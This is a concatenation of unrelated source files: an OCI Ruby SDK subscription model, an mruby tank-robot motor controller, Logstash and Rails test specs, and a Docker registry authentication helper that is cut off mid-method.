PLAN_TYPE_ENUM = [
PLAN_TYPE_FREE_TIER = 'FREE_TIER'.freeze,
PLAN_TYPE_PAYG = 'PAYG'.freeze,
PLAN_TYPE_UNKNOWN_ENUM_VALUE = 'UNKNOWN_ENUM_VALUE'.freeze
].freeze
UPGRADE_STATE_ENUM = [
UPGRADE_STATE_PROMO = 'PROMO'.freeze,
UPGRADE_STATE_SUBMITTED = 'SUBMITTED'.freeze,
UPGRADE_STATE_ERROR = 'ERROR'.freeze,
UPGRADE_STATE_UPGRADED = 'UPGRADED'.freeze,
UPGRADE_STATE_UNKNOWN_ENUM_VALUE = 'UNKNOWN_ENUM_VALUE'.freeze
].freeze
UPGRADE_STATE_DETAILS_ENUM = [
UPGRADE_STATE_DETAILS_TAX_ERROR = 'TAX_ERROR'.freeze,
UPGRADE_STATE_DETAILS_UPGRADE_ERROR = 'UPGRADE_ERROR'.freeze,
UPGRADE_STATE_DETAILS_UNKNOWN_ENUM_VALUE = 'UNKNOWN_ENUM_VALUE'.freeze
].freeze
# Subscription id identifier (OCID).
# @return [String]
attr_accessor :id
# **[Required]** Subscription plan number.
# @return [String]
attr_accessor :subscription_plan_number
# Subscription plan type.
# @return [String]
attr_reader :plan_type
# Start date of the subscription.
# @return [DateTime]
attr_accessor :time_start
# Ship to customer account site address id.
# @return [String]
attr_accessor :ship_to_cust_acct_site_id
# Ship to customer account role.
# @return [String]
attr_accessor :ship_to_cust_acct_role_id
# Bill to customer Account id.
# @return [String]
attr_accessor :bill_to_cust_account_id
# Payment intension.
# @return [BOOLEAN]
attr_accessor :is_intent_to_pay
# Currency code
# @return [String]
attr_accessor :currency_code
# GSI Subscription external code.
# @return [String]
attr_accessor :gsi_org_code
# Language short code (en, de, hu, etc)
# @return [String]
attr_accessor :language_code
# GSI organization external identifier.
# @return [String]
attr_accessor :organization_id
# Status of the upgrade.
# @return [String]
attr_reader :upgrade_state
# This field is used to describe the Upgrade State in case of error (E.g. Upgrade failure caused by interfacing Tax details- TaxError)
# @return [String]
attr_reader :upgrade_state_details
# @return [OCI::OspGateway::Models::TaxInfo]
attr_accessor :tax_info
# Payment option list of a subscription.
# @return [Array<OCI::OspGateway::Models::PaymentOption>]
attr_accessor :payment_options
# @return [OCI::OspGateway::Models::PaymentGateway]
attr_accessor :payment_gateway
# @return [OCI::OspGateway::Models::BillingAddress]
attr_accessor :billing_address
# Date of upgrade/conversion when planType changed from FREE_TIER to PAYG
# @return [DateTime]
attr_accessor :time_plan_upgrade
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
# rubocop:disable Style/SymbolLiteral
'id': :'id',
'subscription_plan_number': :'subscriptionPlanNumber',
'plan_type': :'planType',
'time_start': :'timeStart',
'ship_to_cust_acct_site_id': :'shipToCustAcctSiteId',
'ship_to_cust_acct_role_id': :'shipToCustAcctRoleId',
'bill_to_cust_account_id': :'billToCustAccountId',
'is_intent_to_pay': :'isIntentToPay',
'currency_code': :'currencyCode',
'gsi_org_code': :'gsiOrgCode',
'language_code': :'languageCode',
'organization_id': :'organizationId',
'upgrade_state': :'upgradeState',
'upgrade_state_details': :'upgradeStateDetails',
'tax_info': :'taxInfo',
'payment_options': :'paymentOptions',
'payment_gateway': :'paymentGateway',
'billing_address': :'billingAddress',
'time_plan_upgrade': :'timePlanUpgrade'
# rubocop:enable Style/SymbolLiteral
}
end
# Attribute type mapping.
def self.swagger_types
{
# rubocop:disable Style/SymbolLiteral
'id': :'String',
'subscription_plan_number': :'String',
'plan_type': :'String',
'time_start': :'DateTime',
'ship_to_cust_acct_site_id': :'String',
'ship_to_cust_acct_role_id': :'String',
'bill_to_cust_account_id': :'String',
'is_intent_to_pay': :'BOOLEAN',
'currency_code': :'String',
'gsi_org_code': :'String',
'language_code': :'String',
'organization_id': :'String',
'upgrade_state': :'String',
'upgrade_state_details': :'String',
'tax_info': :'OCI::OspGateway::Models::TaxInfo',
'payment_options': :'Array<OCI::OspGateway::Models::PaymentOption>',
'payment_gateway': :'OCI::OspGateway::Models::PaymentGateway',
'billing_address': :'OCI::OspGateway::Models::BillingAddress',
'time_plan_upgrade': :'DateTime'
# rubocop:enable Style/SymbolLiteral
}
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:disable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
# @option attributes [String] :id The value to assign to the {#id} property
# @option attributes [String] :subscription_plan_number The value to assign to the {#subscription_plan_number} property
# @option attributes [String] :plan_type The value to assign to the {#plan_type} property
# @option attributes [DateTime] :time_start The value to assign to the {#time_start} property
# @option attributes [String] :ship_to_cust_acct_site_id The value to assign to the {#ship_to_cust_acct_site_id} property
# @option attributes [String] :ship_to_cust_acct_role_id The value to assign to the {#ship_to_cust_acct_role_id} property
# @option attributes [String] :bill_to_cust_account_id The value to assign to the {#bill_to_cust_account_id} property
# @option attributes [BOOLEAN] :is_intent_to_pay The value to assign to the {#is_intent_to_pay} property
# @option attributes [String] :currency_code The value to assign to the {#currency_code} property
# @option attributes [String] :gsi_org_code The value to assign to the {#gsi_org_code} property
# @option attributes [String] :language_code The value to assign to the {#language_code} property
# @option attributes [String] :organization_id The value to assign to the {#organization_id} property
# @option attributes [String] :upgrade_state The value to assign to the {#upgrade_state} property
# @option attributes [String] :upgrade_state_details The value to assign to the {#upgrade_state_details} property
# @option attributes [OCI::OspGateway::Models::TaxInfo] :tax_info The value to assign to the {#tax_info} property
# @option attributes [Array<OCI::OspGateway::Models::PaymentOption>] :payment_options The value to assign to the {#payment_options} property
# @option attributes [OCI::OspGateway::Models::PaymentGateway] :payment_gateway The value to assign to the {#payment_gateway} property
# @option attributes [OCI::OspGateway::Models::BillingAddress] :billing_address The value to assign to the {#billing_address} property
# @option attributes [DateTime] :time_plan_upgrade The value to assign to the {#time_plan_upgrade} property
# Initializes the model from an attribute hash. Both camelCase keys (as
# returned by the OSP Gateway service) and snake_case keys are accepted;
# supplying BOTH spellings of the same attribute raises a String error.
# Snake_case, when present, wins because it is assigned last.
def initialize(attributes = {})
  return unless attributes.is_a?(Hash)

  # convert string to symbol for hash key
  attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }

  self.id = attributes[:'id'] if attributes[:'id']

  self.subscription_plan_number = attributes[:'subscriptionPlanNumber'] if attributes[:'subscriptionPlanNumber']

  raise 'You cannot provide both :subscriptionPlanNumber and :subscription_plan_number' if attributes.key?(:'subscriptionPlanNumber') && attributes.key?(:'subscription_plan_number')

  self.subscription_plan_number = attributes[:'subscription_plan_number'] if attributes[:'subscription_plan_number']

  self.plan_type = attributes[:'planType'] if attributes[:'planType']

  raise 'You cannot provide both :planType and :plan_type' if attributes.key?(:'planType') && attributes.key?(:'plan_type')

  self.plan_type = attributes[:'plan_type'] if attributes[:'plan_type']

  self.time_start = attributes[:'timeStart'] if attributes[:'timeStart']

  raise 'You cannot provide both :timeStart and :time_start' if attributes.key?(:'timeStart') && attributes.key?(:'time_start')

  self.time_start = attributes[:'time_start'] if attributes[:'time_start']

  self.ship_to_cust_acct_site_id = attributes[:'shipToCustAcctSiteId'] if attributes[:'shipToCustAcctSiteId']

  raise 'You cannot provide both :shipToCustAcctSiteId and :ship_to_cust_acct_site_id' if attributes.key?(:'shipToCustAcctSiteId') && attributes.key?(:'ship_to_cust_acct_site_id')

  self.ship_to_cust_acct_site_id = attributes[:'ship_to_cust_acct_site_id'] if attributes[:'ship_to_cust_acct_site_id']

  self.ship_to_cust_acct_role_id = attributes[:'shipToCustAcctRoleId'] if attributes[:'shipToCustAcctRoleId']

  raise 'You cannot provide both :shipToCustAcctRoleId and :ship_to_cust_acct_role_id' if attributes.key?(:'shipToCustAcctRoleId') && attributes.key?(:'ship_to_cust_acct_role_id')

  self.ship_to_cust_acct_role_id = attributes[:'ship_to_cust_acct_role_id'] if attributes[:'ship_to_cust_acct_role_id']

  self.bill_to_cust_account_id = attributes[:'billToCustAccountId'] if attributes[:'billToCustAccountId']

  raise 'You cannot provide both :billToCustAccountId and :bill_to_cust_account_id' if attributes.key?(:'billToCustAccountId') && attributes.key?(:'bill_to_cust_account_id')

  self.bill_to_cust_account_id = attributes[:'bill_to_cust_account_id'] if attributes[:'bill_to_cust_account_id']

  # Boolean attribute: tested with .nil? (not truthiness) so an explicit
  # `false` is still assigned.
  self.is_intent_to_pay = attributes[:'isIntentToPay'] unless attributes[:'isIntentToPay'].nil?

  raise 'You cannot provide both :isIntentToPay and :is_intent_to_pay' if attributes.key?(:'isIntentToPay') && attributes.key?(:'is_intent_to_pay')

  self.is_intent_to_pay = attributes[:'is_intent_to_pay'] unless attributes[:'is_intent_to_pay'].nil?

  self.currency_code = attributes[:'currencyCode'] if attributes[:'currencyCode']

  raise 'You cannot provide both :currencyCode and :currency_code' if attributes.key?(:'currencyCode') && attributes.key?(:'currency_code')

  self.currency_code = attributes[:'currency_code'] if attributes[:'currency_code']

  self.gsi_org_code = attributes[:'gsiOrgCode'] if attributes[:'gsiOrgCode']

  raise 'You cannot provide both :gsiOrgCode and :gsi_org_code' if attributes.key?(:'gsiOrgCode') && attributes.key?(:'gsi_org_code')

  self.gsi_org_code = attributes[:'gsi_org_code'] if attributes[:'gsi_org_code']

  self.language_code = attributes[:'languageCode'] if attributes[:'languageCode']

  raise 'You cannot provide both :languageCode and :language_code' if attributes.key?(:'languageCode') && attributes.key?(:'language_code')

  self.language_code = attributes[:'language_code'] if attributes[:'language_code']

  self.organization_id = attributes[:'organizationId'] if attributes[:'organizationId']

  raise 'You cannot provide both :organizationId and :organization_id' if attributes.key?(:'organizationId') && attributes.key?(:'organization_id')

  self.organization_id = attributes[:'organization_id'] if attributes[:'organization_id']

  # upgrade_state / upgrade_state_details / plan_type go through the
  # custom enum-validating writers defined below.
  self.upgrade_state = attributes[:'upgradeState'] if attributes[:'upgradeState']

  raise 'You cannot provide both :upgradeState and :upgrade_state' if attributes.key?(:'upgradeState') && attributes.key?(:'upgrade_state')

  self.upgrade_state = attributes[:'upgrade_state'] if attributes[:'upgrade_state']

  self.upgrade_state_details = attributes[:'upgradeStateDetails'] if attributes[:'upgradeStateDetails']

  raise 'You cannot provide both :upgradeStateDetails and :upgrade_state_details' if attributes.key?(:'upgradeStateDetails') && attributes.key?(:'upgrade_state_details')

  self.upgrade_state_details = attributes[:'upgrade_state_details'] if attributes[:'upgrade_state_details']

  self.tax_info = attributes[:'taxInfo'] if attributes[:'taxInfo']

  raise 'You cannot provide both :taxInfo and :tax_info' if attributes.key?(:'taxInfo') && attributes.key?(:'tax_info')

  self.tax_info = attributes[:'tax_info'] if attributes[:'tax_info']

  self.payment_options = attributes[:'paymentOptions'] if attributes[:'paymentOptions']

  raise 'You cannot provide both :paymentOptions and :payment_options' if attributes.key?(:'paymentOptions') && attributes.key?(:'payment_options')

  self.payment_options = attributes[:'payment_options'] if attributes[:'payment_options']

  self.payment_gateway = attributes[:'paymentGateway'] if attributes[:'paymentGateway']

  raise 'You cannot provide both :paymentGateway and :payment_gateway' if attributes.key?(:'paymentGateway') && attributes.key?(:'payment_gateway')

  self.payment_gateway = attributes[:'payment_gateway'] if attributes[:'payment_gateway']

  self.billing_address = attributes[:'billingAddress'] if attributes[:'billingAddress']

  raise 'You cannot provide both :billingAddress and :billing_address' if attributes.key?(:'billingAddress') && attributes.key?(:'billing_address')

  self.billing_address = attributes[:'billing_address'] if attributes[:'billing_address']

  self.time_plan_upgrade = attributes[:'timePlanUpgrade'] if attributes[:'timePlanUpgrade']

  raise 'You cannot provide both :timePlanUpgrade and :time_plan_upgrade' if attributes.key?(:'timePlanUpgrade') && attributes.key?(:'time_plan_upgrade')

  self.time_plan_upgrade = attributes[:'time_plan_upgrade'] if attributes[:'time_plan_upgrade']
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:enable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Custom attribute writer method checking allowed values (enum).
# @param [Object] plan_type Object to be assigned
# Enum-validating writer: unknown values are logged (when a logger is
# configured) and coerced to the UNKNOWN sentinel so new server-side
# enum values never break older clients.
def plan_type=(plan_type)
  # rubocop:disable Style/ConditionalAssignment
  if plan_type && !PLAN_TYPE_ENUM.include?(plan_type)
    # Interpolate instead of String#+ so a non-String value (e.g. a
    # Symbol) cannot raise TypeError while merely logging.
    OCI.logger.debug("Unknown value for 'plan_type' [#{plan_type}]. Mapping to 'PLAN_TYPE_UNKNOWN_ENUM_VALUE'") if OCI.logger
    @plan_type = PLAN_TYPE_UNKNOWN_ENUM_VALUE
  else
    @plan_type = plan_type
  end
  # rubocop:enable Style/ConditionalAssignment
end
# Custom attribute writer method checking allowed values (enum).
# @param [Object] upgrade_state Object to be assigned
# Enum-validating writer: unknown values are logged (when a logger is
# configured) and coerced to the UNKNOWN sentinel.
def upgrade_state=(upgrade_state)
  # rubocop:disable Style/ConditionalAssignment
  if upgrade_state && !UPGRADE_STATE_ENUM.include?(upgrade_state)
    # Interpolate instead of String#+ so a non-String value cannot
    # raise TypeError while merely logging.
    OCI.logger.debug("Unknown value for 'upgrade_state' [#{upgrade_state}]. Mapping to 'UPGRADE_STATE_UNKNOWN_ENUM_VALUE'") if OCI.logger
    @upgrade_state = UPGRADE_STATE_UNKNOWN_ENUM_VALUE
  else
    @upgrade_state = upgrade_state
  end
  # rubocop:enable Style/ConditionalAssignment
end
# Custom attribute writer method checking allowed values (enum).
# @param [Object] upgrade_state_details Object to be assigned
# Enum-validating writer: unknown values are logged (when a logger is
# configured) and coerced to the UNKNOWN sentinel.
def upgrade_state_details=(upgrade_state_details)
  # rubocop:disable Style/ConditionalAssignment
  if upgrade_state_details && !UPGRADE_STATE_DETAILS_ENUM.include?(upgrade_state_details)
    # Interpolate instead of String#+ so a non-String value cannot
    # raise TypeError while merely logging.
    OCI.logger.debug("Unknown value for 'upgrade_state_details' [#{upgrade_state_details}]. Mapping to 'UPGRADE_STATE_DETAILS_UNKNOWN_ENUM_VALUE'") if OCI.logger
    @upgrade_state_details = UPGRADE_STATE_DETAILS_UNKNOWN_ENUM_VALUE
  else
    @upgrade_state_details = upgrade_state_details
  end
  # rubocop:enable Style/ConditionalAssignment
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# Checks equality by comparing each attribute.
# @param [Object] other the other object to be compared
# Value equality: same class and every documented attribute equal.
# @param [Object] other the object to compare against
def ==(other)
  return true if equal?(other)
  return false unless self.class == other.class

  %i[id subscription_plan_number plan_type time_start
     ship_to_cust_acct_site_id ship_to_cust_acct_role_id
     bill_to_cust_account_id is_intent_to_pay currency_code
     gsi_org_code language_code organization_id upgrade_state
     upgrade_state_details tax_info payment_options payment_gateway
     billing_address time_plan_upgrade].all? do |reader|
    public_send(reader) == other.public_send(reader)
  end
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# @see the `==` method
# @param [Object] other the other object to be compared
def eql?(other)
  # Delegate to == so Hash/Set membership agrees with value equality
  # (the #hash method below is kept consistent with the same attributes).
  self == other
end
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
  # Must list exactly the attributes compared by == (in any fixed order)
  # so that objects that are eql? always share a hash code.
  [id, subscription_plan_number, plan_type, time_start, ship_to_cust_acct_site_id, ship_to_cust_acct_role_id, bill_to_cust_account_id, is_intent_to_pay, currency_code, gsi_org_code, language_code, organization_id, upgrade_state, upgrade_state_details, tax_info, payment_options, payment_gateway, billing_address, time_plan_upgrade].hash
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
  return nil unless attributes.is_a?(Hash)

  self.class.swagger_types.each_pair do |key, type|
    if type =~ /^Array<(.*)>/i
      # check to ensure the input is an array given that the attribute
      # is documented as an array but the input is not
      if attributes[self.class.attribute_map[key]].is_a?(Array)
        public_method("#{key}=").call(
          # Regexp.last_match(1) is the element type captured by the
          # =~ above — do not insert another regexp match in between.
          attributes[self.class.attribute_map[key]]
            .map { |v| OCI::Internal::Util.convert_to_type(Regexp.last_match(1), v) }
        )
      end
    elsif !attributes[self.class.attribute_map[key]].nil?
      public_method("#{key}=").call(
        OCI::Internal::Util.convert_to_type(type, attributes[self.class.attribute_map[key]])
      )
    end
    # or else data not found in attributes(hash), not an issue as the data can be optional
  end

  self
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
  # Human-readable form: the attribute hash rendered as a String.
  to_hash.to_s
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
# Returns the object as a hash keyed by the serialized (wire) names.
# Attributes whose value is nil AND whose ivar was never set are
# omitted, so an explicitly assigned nil still shows up.
def to_hash
  self.class.attribute_map.each_with_object({}) do |(attr, param), result|
    value = public_method(attr).call
    next if value.nil? && !instance_variable_defined?("@#{attr}")

    result[param] = _to_hash(value)
  end
end
private
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
# Recursively converts a value for serialization: arrays are compacted
# and mapped element-wise, hashes are converted value-wise, objects
# responding to #to_hash are converted, and anything else is returned
# unchanged.
# @param [Object] value Any valid value
# @return [Object] the serializable form of +value+
def _to_hash(value)
  case value
  when Array
    value.compact.map { |element| _to_hash(element) }
  when Hash
    value.each_with_object({}) { |(k, v), converted| converted[k] = _to_hash(v) }
  else
    value.respond_to?(:to_hash) ? value.to_hash : value
  end
end
end
end
# rubocop:enable Lint/UnneededCopDisableDirective, Metrics/LineLength
| 45.619565 | 340 | 0.713367 |
38f18f4809c96f8c549c8b10efcf762fdd3cd141 | 2,708 | #!mruby
#Ver.2.27
#TB6612FNG L-L->STOP. L-H->CCW, H-L->CW, H-H->ShortBrake
MaxVero = 120    # peak PWM duty reached when ramping the motors
Rottime = 1500   # in-place rotation time in ms (used by the main loop)
Vero = [4,10]    # PWM output pins driving the two motor channels
Num = [18,3,15,14]   # TB6612 direction inputs, in order: A1, A2, B1, B2
Lev = [0,16]     # control-lever input pins, combined into a 2-bit state
Sens = 17 # analog distance sensor input (original comment was mojibake — TODO confirm sensor type)
Usb = Serial.new(0)
for i in Num do
  pinMode(i, OUTPUT)
end
for i in Lev do
  pinMode(i, 2) # mode 2: input — presumably with pull-up (original comment was mojibake; verify)
end
#-------
# Reads the lever (control input) state as a 2-bit value (0..3).
#-------
# Packs the two lever input pins into a single integer 0..3.
def lever()
  low_bit = digitalRead(Lev[0])
  high_bit = digitalRead(Lev[1])
  low_bit + high_bit * 2
end
#-------
# Stops the tank (all TB6612 inputs LOW = "STOP" per the table above)
#-------
# Drives every TB6612 direction input (A1, A2, B1, B2) low: L-L stops
# each motor channel.
def mstop()
  Num.each do |pin|
    digitalWrite(pin, LOW)
  end
end
#-------
# Ramps the tank up to full speed, driving forward
#-------
# Sets forward polarity (L-H on both channels) and ramps PWM duty from
# 0 up to MaxVero - 1, one step every 5 ms, on both motors.
def mstart()
  digitalWrite(Num[0], LOW)   #A1
  digitalWrite(Num[1], HIGH)  #A2
  digitalWrite(Num[2], LOW)   #B1
  digitalWrite(Num[3], HIGH)  #B2
  (0...MaxVero).each do |duty|
    delay 5
    pwm(Vero[0], duty)
    pwm(Vero[1], duty)
  end
end
#-------
# Rotates the tank in place for t ms (tracks driven in opposite directions)
#-------
# Spins the tank in place: channel A is driven with (r0, r1) and
# channel B with the mirrored (r1, r0), so the tracks turn in opposite
# directions. Speed ramps up, holds for t ms, then ramps back down.
# @param r0 [Integer] HIGH/LOW level applied to A1 and B2
# @param r1 [Integer] HIGH/LOW level applied to A2 and B1
# @param t  [Integer] hold time at full speed, in milliseconds
def rot(r0,r1,t)
  led HIGH
  p = 0
  digitalWrite(Num[0],r0) #A1
  digitalWrite(Num[1],r1) #A2
  digitalWrite(Num[2],r1) #B1
  digitalWrite(Num[3],r0) #B2
  MaxVero.times do
    delay 5
    pwm(Vero[0], p)
    pwm(Vero[1], p)
    p += 1
  end
  delay t
  MaxVero.times do
    # Decrement BEFORE writing: the original wrote duty MaxVero first
    # (one step above the ramp-up peak) and finished at duty 1, leaving
    # the motors creeping until the caller issued mstart/mstop. This
    # mirrors the ramp-up exactly (MaxVero-1 .. 0) and ends at 0.
    p -= 1
    delay 5
    pwm(Vero[0], p)
    pwm(Vero[1], p)
  end
end
#-----------------------------------------
# Bail out immediately if the lever reads 0 at boot — presumably a
# safety/maintenance interlock; confirm against the wiring (with
# pull-ups an idle lever would read 3, not 0).
if(lever == 0)then
  System.exit
end
Usb.println("System Start")
# Debounce counters per lever state; indices 0..3 labelled by the
# original author as front/left/right/break ("brake", presumably).
cons = [0,0,0,0] #front,left,right,break
moveFlg = 0   # 1 while the tank is driving forward
cnt = 0       # consecutive cycles with lever != 3; >6 ends the program
k = 1         # LED heartbeat toggle
while true do
  lvr = lever
  sc = cons[lvr] + 1
  # A lever state that has been seen 4 cycles in a row triggers its
  # action; all counters are then cleared (the current state is
  # re-seeded with sc just below the loop).
  for i in 0..3 do
    if cons[i] == 4 then
      if(i == 0)then
        # State 0 toggles drive: start if stopped, stop if moving.
        if(moveFlg != 1)then
          moveFlg = 1
          Usb.println "Start"
          mstart
        elsif moveFlg != 0 then
          moveFlg = 0
          Usb.println "STOP"
          mstop
        end
      elsif i == 1 then
        Usb.println "Left Rotation"
        rot(LOW, HIGH, Rottime)
        # Resume whatever we were doing before the rotation.
        if(moveFlg == 1)then
          mstart
        else
          mstop
        end
      elsif i == 2 then
        Usb.println "Right Rotation"
        rot(HIGH, LOW, Rottime)
        if(moveFlg == 1)then
          mstart
        else
          mstop
        end
      end
    end
    cons[i] = 0
  end
  cons[lvr] = sc
  #Usb.println cnt.to_s
  # Poll the distance sensor 5 times (~250 ms); an obstacle reading
  # above 420 forces an emergency stop. Threshold is empirical — TODO
  # confirm against the sensor datasheet.
  5.times do
    delay 50
    if(analogRead(Sens) > 420)then
      moveFlg = 0
      Usb.println "STOP"
      mstop
      break
    end
  end
  # Auto-shutdown: roughly 7 consecutive cycles without lever state 3
  # breaks out of the main loop and brakes below.
  if lvr != 3 then
    if cnt > 6 then break end
    cnt += 1
  else
    cnt = 0
  end
  led k
  k = 1 - k
end
# Shutdown: PWM to zero and all direction inputs HIGH — H-H is
# "ShortBrake" on the TB6612 (see table at the top of the file).
pwm(Vero[0], 0)
pwm(Vero[1], 0)
digitalWrite(Num[0],HIGH)
digitalWrite(Num[1],HIGH)
digitalWrite(Num[2],HIGH)
digitalWrite(Num[3],HIGH)
| 17.248408 | 56 | 0.534712 |
6a046982bef4728ce74796a4bcd4f1d3bf3e85ba | 390 | # encoding: utf-8
require 'spec_helper'
require "logstash/filters/sig"
# Smoke test for the custom "sig" logstash filter: when `message` is
# configured, the filter should overwrite the event's message field.
describe LogStash::Filters::Sig do
  describe "Set to Hello World" do
    # Pipeline configuration under test.
    let(:config) do <<-CONFIG
      filter {
        sig {
          message => "Hello World"
        }
      }
    CONFIG
    end

    # Any incoming message is replaced by the configured literal.
    sample("message" => "some text") do
      expect(subject.get("message")).to eq('Hello World')
    end
  end
end
| 18.571429 | 57 | 0.587179 |
ed76c911f91757436a2d6197a2554984edcfbd45 | 3,434 | require 'rails_helper'
# Feature spec covering the four outcomes of uploading an
# "Untagged Animal Assessment" CSV: clean import, bad headers,
# duplicate upload, and rows with missing required fields. All paths
# show the same flash because processing is queued asynchronously; the
# real outcome is asserted on the ProcessedFile record.
describe "upload UntaggedAnimalAssessment category", type: :feature do
  let(:user) { create(:user) }
  let(:valid_file) { "#{Rails.root}/db/sample_data_files/untagged_animal_assessment/Untagged_assessment_03122018.csv" }
  let(:invalid_file) { "#{Rails.root}/spec/support/csv/invalid_headers.csv" }
  let(:incomplete_data_file) { "#{Rails.root}/spec/support/csv/Untagged_assessment_03122018-invalid-rows.csv" }
  let(:expected_success_message) { 'Successfully queued spreadsheet for import' }
  let(:temporary_file) { create(:temporary_file, contents: File.read(valid_file)) }

  before do
    sign_in user
    visit new_file_upload_path
  end

  context 'when user successfully uploads a CSV with no errors' do
    it "creates new ProcessedFile record with 'Processed' status " do
      upload_file("Untagged Animal Assessment", valid_file)
      processed_file = ProcessedFile.last
      expect(ProcessedFile.count).to eq 1
      expect(processed_file.status).to eq "Processed"
      expect(processed_file.job_errors).to eq(nil)
      expect(processed_file.job_stats).to eq(
        { "row_count"=>250,
          "rows_imported"=>250,
          "shl_case_numbers" => {"SF16-9A"=>50, "SF16-9B"=>50, "SF16-9C"=>50, "SF16-9D"=>50, "SF16-9E"=>50},
        }
      )
      expect(page).to have_content expected_success_message
    end
  end

  context 'when user uploads a CSV with invalid headers' do
    it "creates new ProcessedFile record with 'Failed' status" do
      upload_file("Untagged Animal Assessment", invalid_file)
      processed_file = ProcessedFile.last
      expect(ProcessedFile.count).to eq 1
      expect(processed_file.status).to eq "Failed"
      expect(processed_file.job_errors).to eq "Does not have valid header(s). Data not imported!"
      expect(processed_file.job_stats).to eq({})
      expect(page).to have_content expected_success_message
    end
  end

  context 'when user upload a CSV that has been already processed' do
    # Seed an earlier successful import of the same filename/category.
    before do
      FactoryBot.create :processed_file,
        filename: 'Untagged_assessment_03122018.csv',
        category: 'Untagged Animal Assessment',
        status: 'Processed',
        temporary_file_id: temporary_file.id
    end

    it "creates new ProcessedFile record with 'Failed' status" do
      upload_file("Untagged Animal Assessment", valid_file)
      processed_file = ProcessedFile.where(status: "Failed").first
      expect(ProcessedFile.count).to eq 2
      expect(processed_file.job_errors).to eq "Already processed a file on #{processed_file.created_at.strftime('%m/%d/%Y')} with the same name: Untagged_assessment_03122018.csv. Data not imported!"
      expect(processed_file.job_stats).to eq({})
      expect(page).to have_content expected_success_message
    end
  end

  context 'when user upload file with invalid rows' do
    it "creates new ProcessedFile record with 'Failed' status" do
      upload_file("Untagged Animal Assessment", incomplete_data_file)
      processed_file = ProcessedFile.last
      expect(ProcessedFile.count).to eq 1
      expect(processed_file.status).to eq "Failed"
      expect(processed_file.job_errors).to eq("Does not have valid row(s). Data not imported!")
      expect(processed_file.job_stats).to eq({"row_number_2"=>{"cohort"=>[{"error"=>"blank"}]}, "row_number_3"=>{"growout_rack"=>[{"error"=>"blank"}]}})
      expect(page).to have_content expected_success_message
    end
  end
end
| 42.925 | 198 | 0.714619 |
1d82dc968a327638f7266aaf51f43954024f79ff | 2,448 | # Frozen-string-literal: true
# Copyright: 2015 - 2016 Jordon Bedwell - Apache v2.0 License
# Encoding: utf-8
require "base64"
require "json"
require "open3"
module Docker
  module Template
    # Resolves Docker registry credentials from (in priority order) a
    # registry-specific credential helper, DOCKER_* environment
    # variables, or the user's ~/.docker/config.json, and logs the
    # docker-api client in with them.
    class Auth
      DEFAULT_SERVER = "https://index.docker.io/v1/"

      # @param repo [#user] repository descriptor; only #user is read.
      def initialize(repo)
        @repo = repo
      end

      # A "/" in the user portion (e.g. "gcr.io/project") means the
      # registry host is embedded in the repo name, so a credential
      # helper command should be consulted first.
      def auth_with_cmd?
        @repo.user =~ %r!/!
      end

      # True when all three DOCKER_* variables are present in the env.
      def auth_with_env?
        ENV.key?("DOCKER_USERNAME") && \
        ENV.key?("DOCKER_PASSWORD") && \
        ENV.key?("DOCKER_EMAIL")
      end

      # --
      # Authenticate, trying cmd, then env, then config.json. `skip`
      # lets a strategy hand control back here without recursing into
      # itself forever.
      # @raise [Error::UnsuccessfulAuth] when the registry rejects us.
      # --
      def auth(skip: nil)
        return auth_from_cmd if auth_with_cmd? && skip != :cmd
        return auth_from_env if auth_with_env? && skip != :env
        auth_from_config

      # Wrap their error in our own exception type.
      rescue Docker::Error::AuthenticationError
        raise Error::UnsuccessfulAuth
      end

      # --
      # Dispatch to a registry-specific credential helper; only gcr.io
      # is special-cased, everything else falls back to the remaining
      # strategies (skipping :cmd to avoid infinite recursion).
      # --
      def auth_from_cmd
        case @repo.user
        when %r!^gcr\.io/! then auth_from_gcr
        else
          auth({
            skip: :cmd
          })
        end
      end

      # --
      # Authenticate from DOCKER_USERNAME/PASSWORD/EMAIL, defaulting
      # the server to the public Docker Hub index.
      # --
      def auth_from_env
        Docker.authenticate!({
          "username" => ENV["DOCKER_USERNAME"],
          "serveraddress" => ENV["DOCKER_SERVER"] || DEFAULT_SERVER,
          "password" => ENV["DOCKER_PASSWORD"],
          "email" => ENV["DOCKER_EMAIL"]
        })
      end

      # --
      # Authenticate every entry found in ~/.docker/config.json.
      # --
      def auth_from_config
        cred = Pathutil.new("~/.docker/config.json")
        cred = cred.expand_path.read_json
        return if cred.empty?

        # "auths" may be absent from an otherwise non-empty config;
        # the original indexed it unconditionally and crashed with
        # NoMethodError on nil in that case.
        (cred["auths"] || {}).each do |server, info|
          next if info.empty?
          user, pass = Base64.decode64(info["auth"]).split(":", 2)
          Docker.authenticate!({
            "username" => user,
            "serveraddress" => server,
            "email" => info["email"],
            "password" => pass
          })
        end
      end

      private

      # --
      # Ask the docker-credential-gcr helper for gcr.io credentials.
      # The block form of popen3 closes all pipes and reaps the child;
      # the original bare popen3 leaked the wait thread and process.
      # --
      def auth_from_gcr
        server, = @repo.user.split("/", 2)
        val = Open3.popen3("docker-credential-gcr get") do |stdin, stdout, _stderr, _wait_thr|
          stdin.puts server
          stdin.close
